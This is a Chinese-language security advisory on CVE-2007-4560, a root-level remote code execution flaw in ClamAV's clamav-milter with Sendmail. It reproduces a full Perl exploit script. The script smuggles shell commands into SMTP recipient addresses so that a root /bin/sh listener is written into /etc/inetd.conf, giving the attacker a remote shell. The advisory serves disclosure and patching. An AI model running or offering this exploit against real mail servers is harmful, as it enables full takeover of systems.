ClamAV Popen函数远程代码执行漏洞
发布日期:2007-08-25
更新日期:2008-03-19
受影响系统:ClamAV ClamAV < 0.91.2
不受影响系统:ClamAV ClamAV 0.91.2
描述:
BUGTRAQ ID:
25439
CVE ID:
CVE-2007-4560
Clam AntiVirus是Unix的GPL杀毒工具包,很多邮件网关产品都在使用。
ClamAV在实现上存在远程代码执行漏洞,攻击者可利用此漏洞以超级用户权限执行任意代码。
<*来源:Nikolaos Rangos
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Nikolaos Rangos ()提供了如下测试方法:
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
建议:
厂商补丁:
ClamAV
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.clamav.net/浏览次数:1893
严重程度:0(网友投票)